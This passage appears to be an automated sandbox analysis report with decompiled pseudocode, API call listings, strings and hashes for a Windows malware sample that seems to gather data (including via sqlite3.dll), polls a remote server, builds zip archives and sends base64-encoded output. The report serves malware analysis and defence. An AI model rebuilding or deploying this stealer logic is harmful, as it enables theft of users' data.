40bc9b call 409e88 139->143 140->139 145 40bca8 call 4166f5 142->145 146 40bcad-40bccb call 41ced3 142->146 143->142 145->146 150 40bd26-40bd49 CreateThread 146->150 151 40bccd-40bce9 CryptBinaryToStringA 146->151 152 40bda2-40bda8 150->152 151->150 153 40bceb-40bd01 GetProcessHeap 
HeapAlloc 151->153 154 40bdaa-40bdbb Sleep 152->154 155 40bd4b-40bd51 152->155 153->150 156 40bd03-40bd09 153->156 154->154 159 40bdbd-40bdd1 CloseHandle 154->159 155->159 160 40bd53-40bd5a 155->160 157 40bd11-40bd20 CryptBinaryToStringA 156->157 158 40bd0b-40bd0f 156->158 157->150 158->157 158->158 161 40bdd3-40bddb 159->161 162 40bde6 call 41cf3e 159->162 163 40bd73-40bd7a 160->163 164 40bd5c 160->164 161->162 165 40bddd-40bde4 call 408318 161->165 172 40bdeb-40be1f call 4164a1 call 404354 call 41da9b 162->172 166 40bd86-40bd90 CreateThread 163->166 169 40bd7c-40bd7f 163->169 164->166 167 40bd5e-40bd65 164->167 165->172 174 40bd96-40bda1 Sleep 166->174 167->166 171 40bd67-40bd69 167->171 169->166 173 40bd81 169->173 171->166 176 40bd6b-40bd6d 171->176 178 40bd84 173->178 174->152 176->166 179 40bd6f-40bd71 176->179 178->166 178->174 179->178
                                                                    C-Code - Quality: 85%
                                                                    			E0040B7EC(void* __edx, void* __fp0) {
                                                                    				char _v8;
                                                                    				char _v16;
                                                                    				char _v20;
                                                                    				signed int _v24;
                                                                    				char _v36;
                                                                    				char _v40;
                                                                    				intOrPtr _v44;
                                                                    				signed int _v52;
                                                                    				char _v1044;
                                                                    				char _v2028;
                                                                    				char _v2292;
                                                                    				char _v2300;
                                                                    				char _v2316;
                                                                    				char _v2320;
                                                                    				char _v2348;
                                                                    				char _v2376;
                                                                    				char _v2384;
                                                                    				char _v2404;
                                                                    				char _v2412;
                                                                    				intOrPtr _v2420;
                                                                    				struct _SECURITY_ATTRIBUTES* _v2424;
                                                                    				char _v2440;
                                                                    				char _v2456;
                                                                    				signed int _v2460;
                                                                    				intOrPtr _v2484;
                                                                    				char _v2486;
                                                                    				char _v2487;
                                                                    				char _v2488;
                                                                    				char _v2489;
                                                                    				char _v2490;
                                                                    				char _v2491;
                                                                    				char _v2492;
                                                                    				int _v2496;
                                                                    				intOrPtr _v2500;
                                                                    				BYTE* _v2504;
                                                                    				intOrPtr _v2508;
                                                                    				int _v2512;
                                                                    				void _v2516;
                                                                    				void _v2520;
                                                                    				int _v2536;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t99;
                                                                    				signed int _t101;
                                                                    				char* _t106;
                                                                    				CHAR* _t107;
                                                                    				CHAR* _t111;
                                                                    				CHAR* _t115;
                                                                    				void* _t120;
                                                                    				char* _t124;
                                                                    				CHAR* _t127;
                                                                    				CHAR* _t134;
                                                                    				void* _t135;
                                                                    				CHAR* _t136;
                                                                    				void* _t137;
                                                                    				char* _t139;
                                                                    				void* _t144;
                                                                    				void* _t150;
                                                                    				void* _t152;
                                                                    				signed int _t156;
                                                                    				signed int _t161;
                                                                    				void* _t164;
                                                                    				signed int _t170;
                                                                    				signed int _t173;
                                                                    				signed int _t176;
                                                                    				signed int _t177;
                                                                    				signed int _t181;
                                                                    				char* _t183;
                                                                    				CHAR* _t193;
                                                                    				void* _t194;
                                                                    				CHAR* _t195;
                                                                    				void* _t196;
                                                                    				void* _t207;
                                                                    				long _t208;
                                                                    				void* _t213;
                                                                    				signed int _t215;
                                                                    				char _t218;
                                                                    				char _t219;
                                                                    				char _t220;
                                                                    				char _t221;
                                                                    				char _t222;
                                                                    				signed int _t223;
                                                                    				void* _t232;
                                                                    				signed int _t233;
                                                                    				void* _t234;
                                                                    				void* _t235;
                                                                    				CHAR* _t237;
                                                                    				char* _t240;
                                                                    				signed int _t241;
                                                                    				signed int _t242;
                                                                    				void* _t243;
                                                                    				void* _t244;
                                                                    				_Unknown_base(*)()* _t251;
                                                                    				void* _t252;
                                                                    				void* _t256;
                                                                    				signed int _t257;
                                                                    				signed int _t259;
                                                                    				char _t260;
                                                                    				intOrPtr _t261;
                                                                    				void* _t262;
                                                                    				signed int _t263;
                                                                    				intOrPtr _t264;
                                                                    				intOrPtr _t265;
                                                                    				char* _t266;
                                                                    				void _t267;
                                                                    				char* _t268;
                                                                    				BYTE* _t269;
                                                                    				void* _t285;
                                                                    
                                                                    				_t285 = __fp0;
                                                                    				_t234 = __edx;
                                                                    				_push(0xffffffff);
                                                                    				_push(E00434E59);
                                                                    				_push( *[fs:0x0]);
                                                                    				_t259 = (_t257 & 0xfffffff8) - 0x9b8;
                                                                    				_t99 =  *0x443674; // 0x393162b1
                                                                    				_v24 = _t99 ^ _t259;
                                                                    				_push(_t244);
                                                                    				_push(_t235);
                                                                    				_t101 =  *0x443674; // 0x393162b1
                                                                    				_push(_t101 ^ _t259);
                                                                    				 *[fs:0x0] =  &_v16;
                                                                    				_v2420 = 0xf;
                                                                    				_v2424 = 0;
                                                                    				_v2440 = 0;
                                                                    				_v8 = 0;
                                                                    				E0040121A();
                                                                    				E00418B05();
                                                                    				 *0x4461ec = 0x9c40;
                                                                    				 *0x4461f8 = 0;
                                                                    				_t208 = 0x3e8;
                                                                    				_t106 =  &_v2028;
                                                                    				do {
                                                                    					 *_t106 = 0;
                                                                    					_t106 = _t106 + 1;
                                                                    					_t208 = _t208 - 1;
                                                                    					_t271 = _t208;
                                                                    				} while (_t208 != 0);
                                                                    				_t107 = E00414C66(0,  &_v2348, _t235, _t244, _t271); // executed
                                                                    				_v8 = 1;
                                                                    				if(_t107[0x14] >= 0x10) {
                                                                    					_t107 =  *_t107;
                                                                    				}
                                                                    				lstrcatA( &_v2028, _t107);
                                                                    				_v8 = 0;
                                                                    				E00404354( &_v2348, 1, 0);
                                                                    				_t245 =  &_v2412;
                                                                    				_t111 = E00415326(_t235,  &_v2412); // executed
                                                                    				_v16 = 2;
                                                                    				_t273 = _t111[0x14] - 0x10;
                                                                    				if(_t111[0x14] >= 0x10) {
                                                                    					_t111 =  *_t111;
                                                                    				}
                                                                    				lstrcatA( &_v2028, _t111);
                                                                    				_v8 = 0;
                                                                    				E00404354( &_v2404, 1, 0);
                                                                    				_t115 = E00414F0E(0, _t234,  &_v2384, _t245, _t273); // executed
                                                                    				_v16 = 3;
                                                                    				if(_t115[0x14] >= 0x10) {
                                                                    					_t115 =  *_t115;
                                                                    				}
                                                                    				lstrcatA( &_v2028, _t115);
                                                                    				_v8 = 0;
                                                                    				E00404354( &_v2376, 1, 0);
                                                                    				while(1) {
                                                                    					_t120 = OpenEventA(0x1f0003, 0,  &_v2028);
                                                                    					 *0x4461f4 = _t120;
                                                                    					if(_t120 == 0) {
                                                                    						break;
                                                                    					}
                                                                    					CloseHandle(_t120);
                                                                    					Sleep(0x1388);
                                                                    				}
                                                                    				 *0x4461f4 = CreateEventA(0, 0, 0,  &_v2028);
                                                                    				_t213 = 0x104;
                                                                    				_t124 =  &_v2292;
                                                                    				do {
                                                                    					 *_t124 = 0;
                                                                    					_t124 = _t124 + 1;
                                                                    					_t213 = _t213 - 1;
                                                                    				} while (_t213 != 0);
                                                                    				lstrcatA( &_v2292, "/");
                                                                    				_t127 = E00408392( &_v2320);
                                                                    				_v8 = 4;
                                                                    				_t277 = _t127[0x14] - 0x10;
                                                                    				if(_t127[0x14] >= 0x10) {
                                                                    					_t127 =  *_t127;
                                                                    				}
                                                                    				lstrcatA( &_v2292, _t127);
                                                                    				_t214 =  &_v2320;
                                                                    				_v8 = 0;
                                                                    				E00404354( &_v2320, 1, 0);
                                                                    				_t237 = 0x4442dc;
                                                                    				while(1) {
                                                                    					_push("|");
                                                                    					_t260 = _t259 - 0x1c;
                                                                    					_v2492 = _t260;
                                                                    					E004083D8(_t260);
                                                                    					_t261 = _t260 - 0x1c;
                                                                    					_v8 = 6;
                                                                    					_t249 = _t261;
                                                                    					_v2484 = _t261;
                                                                    					E0040841E(_t261);
                                                                    					_v8 = 0;
                                                                    					E0040A9FD(0, _t214, _t234, _t237, _t261, _t277);
                                                                    					_t134 =  *0x4442dc; // 0x4be1588
                                                                    					_t262 = _t261 + 0x3c;
                                                                    					if( *0x4442f0 < 0x10) {
                                                                    						_t134 = _t237;
                                                                    					}
                                                                    					_t135 =  *0x446458(_t134, "ERROR");
                                                                    					_t279 = _t135;
                                                                    					if(_t135 != 0) {
                                                                    						_t268 = _t262 - 0x1c;
                                                                    						_t214 = _t268;
                                                                    						_v2492 = _t268;
                                                                    						 *((intOrPtr*)(_t214 + 0x14)) = 0xf;
                                                                    						 *((intOrPtr*)(_t214 + 0x10)) = 0;
                                                                    						 *_t214 = 0;
                                                                    						E00404331(_t214,  &_v2300);
                                                                    						_t269 = _t268 - 0x1c;
                                                                    						_v20 = 7;
                                                                    						_t249 = _t269;
                                                                    						_v2504 = _t269;
                                                                    						E00404778(_t269, _t237);
                                                                    						_v24 = 0;
                                                                    						E0040AB1D(0, _t237, _t269, _t279);
                                                                    						_t262 = _t269 + 0x38;
                                                                    					}
                                                                    					_t136 =  *0x4442dc; // 0x4be1588
                                                                    					if( *0x4442f0 < 0x10) {
                                                                    						_t136 = _t237;
                                                                    					}
                                                                    					_t137 =  *0x446458(_t136, "ERROR");
                                                                    					_t281 = _t137;
                                                                    					if(_t137 != 0) {
                                                                    						break;
                                                                    					}
                                                                    					_push("|");
                                                                    					_t264 = _t262 - 0x1c;
                                                                    					_v2500 = _t264;
                                                                    					E004083FB(_t264);
                                                                    					_t265 = _t264 - 0x1c;
                                                                    					_v24 = 9;
                                                                    					_t249 = _t265;
                                                                    					_v2508 = _t265;
                                                                    					E0040841E(_t265);
                                                                    					_v24 = 0;
                                                                    					E0040A9FD(0, _t214, _t234, _t237, _t265, _t281);
                                                                    					_t193 =  *0x4442dc; // 0x4be1588
                                                                    					_t262 = _t265 + 0x3c;
                                                                    					if( *0x4442f0 < 0x10) {
                                                                    						_t193 = _t237;
                                                                    					}
                                                                    					_t194 =  *0x446458(_t193, "ERROR");
                                                                    					_t283 = _t194;
                                                                    					if(_t194 != 0) {
                                                                    						_t266 = _t262 - 0x1c;
                                                                    						_t214 = _t266;
                                                                    						_v2508 = _t266;
                                                                    						 *((intOrPtr*)(_t214 + 0x14)) = 0xf;
                                                                    						 *((intOrPtr*)(_t214 + 0x10)) = 0;
                                                                    						 *_t214 = 0;
                                                                    						E00404331(_t214,  &_v2316);
                                                                    						_t267 = _t266 - 0x1c;
                                                                    						_v36 = 0xa;
                                                                    						_t249 = _t267;
                                                                    						_v2520 = _t267;
                                                                    						E00404778(_t267, _t237);
                                                                    						_v40 = 0;
                                                                    						E0040AB1D(0, _t237, _t267, _t283);
                                                                    						_t262 = _t267 + 0x38;
                                                                    					}
                                                                    					_t195 =  *0x4442dc; // 0x4be1588
                                                                    					if( *0x4442f0 < 0x10) {
                                                                    						_t195 = _t237;
                                                                    					}
                                                                    					_t196 =  *0x446458(_t195, "ERROR");
                                                                    					_t277 = _t196;
                                                                    					if(_t196 == 0) {
                                                                    						Sleep(0x1d4c0); // executed
                                                                    						continue;
                                                                    					}
                                                                    					break;
                                                                    				}
                                                                    				 *0x4461f0 = E0041CDBD(0, _t237, _t249, _t256, __eflags);
                                                                    				_t215 = 0x3e8;
                                                                    				_t139 =  &_v1044;
                                                                    				do {
                                                                    					 *_t139 = 0;
                                                                    					_t139 = _t139 + 1;
                                                                    					_t215 = _t215 - 1;
                                                                    					__eflags = _t215;
                                                                    				} while (_t215 != 0);
                                                                    				__eflags =  *0x4442f0 - 0x10;
                                                                    				if(__eflags >= 0) {
                                                                    					_t237 =  *0x4442dc; // 0x4be1588
                                                                    				}
                                                                    				lstrcatA( &_v1044, _t237);
                                                                    				lstrcatA( &_v1044, "/");
                                                                    				_t144 = 0xa;
                                                                    				lstrcatA( &_v1044, E00415EF6(_t144, __eflags));
                                                                    				lstrcatA( &_v1044, ".zip");
                                                                    				_t150 = E0040DE3A( &_v1044, __eflags);
                                                                    				_push(_t234);
                                                                    				_push(_t150);
                                                                    				 *0x4461e4 = E00408202(0, _t234, _t237, _t249, __eflags);
                                                                    				_t152 = E0040AC0F(0, 0x43c8d8, 0);
                                                                    				_t218 =  *0x4465e4; // 0x0
                                                                    				_v2491 = _t218;
                                                                    				_t219 =  *0x4465e5; // 0x0
                                                                    				_v2490 = _t219;
                                                                    				_t220 =  *0x4465e7; // 0x0
                                                                    				_v2489 = _t220;
                                                                    				_t221 =  *0x4465e8; // 0x0
                                                                    				_v2488 = _t221;
                                                                    				_t222 =  *0x4465e9; // 0x0
                                                                    				_t263 = _t262 + 0xc;
                                                                    				__eflags =  *0x4465e6; // 0x0
                                                                    				_v2487 = _t222;
                                                                    				_t223 =  *0x4461f0; // 0x0
                                                                    				_v2460 = _t223;
                                                                    				_t224 = _t223 & 0xffffff00 | __eflags != 0x00000000;
                                                                    				_t250 =  &_v2492;
                                                                    				_v2492 = 1;
                                                                    				_v2486 = _t223 & 0xffffff00 | __eflags != 0x00000000;
                                                                    				E004133B9(_t234,  &_v2492, __eflags, _t152, _t234);
                                                                    				__eflags =  *0x4465ec; // 0x0
                                                                    				if(__eflags != 0) {
                                                                    					E0040903E(0, 0x43c8d8,  &_v2492);
                                                                    				}
                                                                    				E0040AFB3(0, _t224, _t234, 0x43c8d8, _t250, __eflags, _t285);
                                                                    				__eflags =  *0x4465e6; // 0x0
                                                                    				if(__eflags != 0) {
                                                                    					E0040CB83(0, _t234, 0x43c8d8,  &_v2456, __eflags);
                                                                    				}
                                                                    				__eflags =  *0x4465eb; // 0x0
                                                                    				if(__eflags != 0) {
                                                                    					E00409E88();
                                                                    				}
                                                                    				__eflags =  *0x4465ea; // 0x0
                                                                    				if(__eflags != 0) {
                                                                    					E004166F5(_t234);
                                                                    				}
                                                                    				_t156 =  *0x4461f0; // 0x0
                                                                    				E0041CED3(_t156, _t224,  &_v2504,  &_v2496);
                                                                    				_t240 = 0;
                                                                    				_v2520 = 0;
                                                                    				__eflags = _v2504;
                                                                    				if(_v2504 != 0) {
                                                                    					_t181 = CryptBinaryToStringA(_v2504, _v2496, 0x40000001, 0,  &_v2520);
                                                                    					__eflags = _t181;
                                                                    					if(_t181 != 0) {
                                                                    						_t183 = HeapAlloc(GetProcessHeap(), 0, _v2536);
                                                                    						_t240 = _t183;
                                                                    						__eflags = _t240;
                                                                    						if(_t240 != 0) {
                                                                    							_t233 = _v2536;
                                                                    							__eflags = _t233;
                                                                    							while(_t233 != 0) {
                                                                    								 *_t183 = 0;
                                                                    								_t183 =  &(_t183[1]);
                                                                    								_t233 = _t233 - 1;
                                                                    								__eflags = _t233;
                                                                    							}
                                                                    							CryptBinaryToStringA(_v2520, _v2512, 0x40000001, _t240,  &_v2536);
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				_v2512 = _v2520;
                                                                    				_t251 = E0040ACB9;
                                                                    				_v2516 = _t240;
                                                                    				CreateThread(0, 0, E0040ACB9,  &_v2516, 0, 0);
                                                                    				_t241 = 0;
                                                                    				while(1) {
                                                                    					__eflags =  *0x4465f0; // 0x0
                                                                    					if(__eflags != 0) {
                                                                    						goto L64;
                                                                    					}
                                                                    					__eflags =  *0x4465f4; // 0x0
                                                                    					if(__eflags == 0) {
                                                                    						__eflags = _t241 - 0x12c;
                                                                    						if(__eflags > 0) {
                                                                    							_t170 = _t241 - 0x168;
                                                                    							__eflags = _t170;
                                                                    							if(_t170 == 0) {
                                                                    								goto L61;
                                                                    							} else {
                                                                    								_t173 = _t170 - 0x3c;
                                                                    								__eflags = _t173;
                                                                    								if(_t173 == 0) {
                                                                    									goto L61;
                                                                    								} else {
                                                                    									__eflags = _t173 - 0x3c;
                                                                    									goto L60;
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							if(__eflags == 0) {
                                                                    								L61:
                                                                    								CreateThread(0, 0, _t251,  &_v2520, 0, 0);
                                                                    							} else {
                                                                    								_t232 = 0x3c;
                                                                    								_t176 = _t241 - _t232;
                                                                    								__eflags = _t176;
                                                                    								if(_t176 == 0) {
                                                                    									goto L61;
                                                                    								} else {
                                                                    									_t177 = _t176 - _t232;
                                                                    									__eflags = _t177;
                                                                    									if(_t177 == 0) {
                                                                    										goto L61;
                                                                    									} else {
                                                                    										__eflags = _t177 - _t232;
                                                                    										if(__eflags == 0) {
                                                                    											goto L61;
                                                                    										} else {
                                                                    											L60:
                                                                    											if(__eflags == 0) {
                                                                    												goto L61;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						Sleep(0x3e8);
                                                                    						_t241 = _t241 + 1;
                                                                    						__eflags = _t241;
                                                                    						continue;
                                                                    					}
                                                                    					L65:
                                                                    					_t161 = CloseHandle( *0x4461f4);
                                                                    					_t242 =  *0x4461f0; // 0x0
                                                                    					__eflags = _t242;
                                                                    					if(_t242 == 0) {
                                                                    						L68:
                                                                    						E0041CF3E(_t242);
                                                                    					} else {
                                                                    						 *_t242 - 1 = _t161 & 0xffffff00 |  *_t242 == 0x00000001;
                                                                    						if((_t161 & 0xffffff00 |  *_t242 == 0x00000001) == 0) {
                                                                    							goto L68;
                                                                    						} else {
                                                                    							E00408318(_t251, _t242);
                                                                    						}
                                                                    					}
                                                                    					E004164A1(0, _t234, _t242, _t251, __eflags);
                                                                    					_t164 = E00404354( &_v2460, 1, 0);
                                                                    					 *[fs:0x0] = _v44;
                                                                    					_pop(_t243);
                                                                    					_pop(_t252);
                                                                    					_pop(_t207);
                                                                    					__eflags = _v52 ^ _t263;
                                                                    					return E0041DA9B(_t164, _t207, _v52 ^ _t263, _t234, _t243, _t252);
                                                                    				}
                                                                    				do {
                                                                    					L64:
                                                                    					Sleep(0x3e8);
                                                                    					__eflags =  *0x4465f8; // 0x0
                                                                    				} while (__eflags == 0);
                                                                    				goto L65;
                                                                    			}
                                                                    0x0040bd35
                                                                    0x0040bd3d
                                                                    0x0040bd41
                                                                    0x0040bd47
                                                                    0x0040bda2
                                                                    0x0040bda2
                                                                    0x0040bda8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040bd4b
                                                                    0x0040bd51
                                                                    0x0040bd58
                                                                    0x0040bd5a
                                                                    0x0040bd75
                                                                    0x0040bd75
                                                                    0x0040bd7a
                                                                    0x00000000
                                                                    0x0040bd7c
                                                                    0x0040bd7c
                                                                    0x0040bd7c
                                                                    0x0040bd7f
                                                                    0x00000000
                                                                    0x0040bd81
                                                                    0x0040bd81
                                                                    0x00000000
                                                                    0x0040bd81
                                                                    0x0040bd7f
                                                                    0x0040bd5c
                                                                    0x0040bd5c
                                                                    0x0040bd86
                                                                    0x0040bd90
                                                                    0x0040bd5e
                                                                    0x0040bd62
                                                                    0x0040bd63
                                                                    0x0040bd63
                                                                    0x0040bd65
                                                                    0x00000000
                                                                    0x0040bd67
                                                                    0x0040bd67
                                                                    0x0040bd67
                                                                    0x0040bd69
                                                                    0x00000000
                                                                    0x0040bd6b
                                                                    0x0040bd6b
                                                                    0x0040bd6d
                                                                    0x00000000
                                                                    0x0040bd6f
                                                                    0x0040bd84
                                                                    0x0040bd84
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040bd84
                                                                    0x0040bd6d
                                                                    0x0040bd69
                                                                    0x0040bd65
                                                                    0x0040bd5c
                                                                    0x0040bd9b
                                                                    0x0040bda1
                                                                    0x0040bda1
                                                                    0x00000000
                                                                    0x0040bda1
                                                                    0x0040bdbd
                                                                    0x0040bdc3
                                                                    0x0040bdc9
                                                                    0x0040bdcf
                                                                    0x0040bdd1
                                                                    0x0040bde6
                                                                    0x0040bde6
                                                                    0x0040bdd3
                                                                    0x0040bdd9
                                                                    0x0040bddb
                                                                    0x00000000
                                                                    0x0040bddd
                                                                    0x0040bdde
                                                                    0x0040bde3
                                                                    0x0040bddb
                                                                    0x0040bdeb
                                                                    0x0040bdf7
                                                                    0x0040be03
                                                                    0x0040be0b
                                                                    0x0040be0c
                                                                    0x0040be0d
                                                                    0x0040be15
                                                                    0x0040be1f
                                                                    0x0040be1f
                                                                    0x0040bdaa
                                                                    0x0040bdaa
                                                                    0x0040bdaf
                                                                    0x0040bdb5
                                                                    0x0040bdb5
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32(76FF0000,0040B84F), ref: 00418B19
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418B30
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418B47
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418B5E
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418B75
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418B8C
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418BA3
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418BBA
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418BD1
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418BE8
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418BFF
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C16
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C2D
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C44
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C5B
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C72
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C89
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418CA0
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418CB7
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418CCE
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418CE5
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418CFC
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418D13
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418D2A
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B896
                                                                    • lstrcatA.KERNEL32(?,00000000,00000001,00000000), ref: 0040B8D4
                                                                    • lstrcatA.KERNEL32(?,00000000,00000001,00000000), ref: 0040B912
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B936
                                                                    • Sleep.KERNEL32(00001388), ref: 0040B941
                                                                    • OpenEventA.KERNEL32(001F0003,00000000,?,00000001,00000000), ref: 0040B951
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 0040B96B
                                                                    • lstrcatA.KERNEL32(?,0043EC2C), ref: 0040B995
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B9C0
                                                                    • StrCmpCA.SHLWAPI(04BE1588,ERROR), ref: 0040BA2F
                                                                    • StrCmpCA.SHLWAPI(04BE1588,ERROR), ref: 0040BA97
                                                                    • StrCmpCA.SHLWAPI(04BE1588,ERROR), ref: 0040BAF3
                                                                    • StrCmpCA.SHLWAPI(04BE1588,ERROR), ref: 0040BB5B
                                                                    • Sleep.KERNELBASE(0001D4C0), ref: 0040BB6A
                                                                    • lstrcatA.KERNEL32(?,004442DC), ref: 0040BBA9
                                                                    • lstrcatA.KERNEL32(?,0043EC2C), ref: 0040BBBC
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040BBD3
                                                                    • lstrcatA.KERNEL32(?,.zip), ref: 0040BBE6
                                                                      • Part of subcall function 0040DE3A: StrCmpCA.SHLWAPI(00000000,https,004442DC,?,00000000), ref: 0040DE70
                                                                      • Part of subcall function 0040DE3A: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040DE83
                                                                      • Part of subcall function 0040DE3A: HeapAlloc.KERNEL32(00000000), ref: 0040DE8A
                                                                      • Part of subcall function 0040DE3A: InternetOpenA.WININET(0043C8D8,00000000,00000000,00000000,00000000), ref: 0040DE9C
                                                                      • Part of subcall function 0040DE3A: InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 0040DEB7
                                                                      • Part of subcall function 0040DE3A: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 0040DED3
                                                                      • Part of subcall function 0040DE3A: InternetCloseHandle.WININET(00000000), ref: 0040DF11
                                                                      • Part of subcall function 0040DE3A: InternetCloseHandle.WININET(?), ref: 0040DF1A
                                                                      • Part of subcall function 00408202: __EH_prolog3.LIBCMT ref: 00408209
                                                                      • Part of subcall function 0040AC0F: GetProcessHeap.KERNEL32(00000000,?), ref: 0040AC72
                                                                      • Part of subcall function 0040AC0F: HeapAlloc.KERNEL32(00000000), ref: 0040AC79
                                                                      • Part of subcall function 004133B9: GetProcessHeap.KERNEL32(00000000,0098967F,0043C8D8,00000000), ref: 004133D6
                                                                      • Part of subcall function 004133B9: HeapAlloc.KERNEL32(00000000), ref: 004133DD
                                                                    • CryptBinaryToStringA.CRYPT32(?,00000001,40000001,00000000,?), ref: 0040BCE1
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BCF0
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BCF7
                                                                    • CryptBinaryToStringA.CRYPT32(?,00000001,40000001,00000000,?), ref: 0040BD20
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000ACB9,?,00000000,00000000), ref: 0040BD41
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000ACB9,?,00000000,00000000), ref: 0040BD90
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040BD9B
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040BDAF
                                                                    • CloseHandle.KERNEL32 ref: 0040BDC3
                                                                      • Part of subcall function 0040903E: lstrcatA.KERNEL32(?), ref: 0040907F
                                                                      • Part of subcall function 0040903E: lstrcatA.KERNEL32(?,00000000), ref: 00409095
                                                                      • Part of subcall function 0040903E: lstrcatA.KERNEL32(?,?), ref: 004090A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$lstrcat$Heap$Internet$AllocCloseHandleProcessSleep$CreateOpen$BinaryCryptEventStringThread$CountH_prolog3OptionTick_malloc_randwsprintf
                                                                    • String ID: .zip$ERROR$sqlite3.dll
                                                                    • API String ID: 3485534380-1912465208
                                                                    • Opcode ID: 4f7ad39070347914283b21a27445a946a07588db11bf74e0a69aa3b5ad8fda64
                                                                    • Instruction ID: c1a536a978d1d65f318c699a06e9751ecdf5777d7b1f99d3148499f142e5a99c
                                                                    • Opcode Fuzzy Hash: 4f7ad39070347914283b21a27445a946a07588db11bf74e0a69aa3b5ad8fda64
                                                                    • Instruction Fuzzy Hash: 1CF1C4755083809FD720EB65DC45A9B7BA8EB97304F05097FF585A3292CB389844CBAF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    [Control-flow graph of function 0040A1C1; nodes are marked Executed or Not Executed.]
                                                                    C-Code - Quality: 89%
                                                                    			E0040A1C1(void* __ecx, void* __eflags) {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t283;
                                                                    				signed int _t284;
                                                                    				intOrPtr _t287;
                                                                    				void* _t290;
                                                                    				short _t297;
                                                                    				void* _t299;
                                                                    				intOrPtr _t301;
                                                                    				intOrPtr _t302;
                                                                    				void* _t311;
                                                                    				short _t314;
                                                                    				void* _t316;
                                                                    				void* _t320;
                                                                    				void* _t325;
                                                                    				void* _t328;
                                                                    				void* _t330;
                                                                    				void* _t332;
                                                                    				void* _t333;
                                                                    				char* _t335;
                                                                    				char* _t336;
                                                                    				char* _t338;
                                                                    				void* _t340;
                                                                    				intOrPtr _t341;
                                                                    				intOrPtr _t343;
                                                                    				signed int _t344;
                                                                    				char* _t356;
                                                                    				void* _t357;
                                                                    				void* _t359;
                                                                    				short _t361;
                                                                    				void* _t366;
                                                                    				void* _t396;
                                                                    				short _t402;
                                                                    				void* _t403;
                                                                    				void* _t406;
                                                                    				char* _t420;
                                                                    				void* _t442;
                                                                    				void* _t445;
                                                                    				void* _t448;
                                                                    				void* _t458;
                                                                    				long _t462;
                                                                    				char* _t463;
                                                                    				void* _t464;
                                                                    				void* _t465;
                                                                    				signed int _t471;
                                                                    				void* _t473;
                                                                    
                                                                    				_t471 = _t473 - 0x3de8;
                                                                    				E0042E300(0x3de8);
                                                                    				_push(0xffffffff);
                                                                    				_push(E00433F4A);
                                                                    				_push( *[fs:0x0]);
                                                                    				_t283 =  *0x443674; // 0x393162b1
                                                                    				_t284 = _t283 ^ _t471;
                                                                    				 *(_t471 + 0x3de4) = _t284;
                                                                    				_push(_t284);
                                                                    				 *[fs:0x0] = _t471 - 0xc;
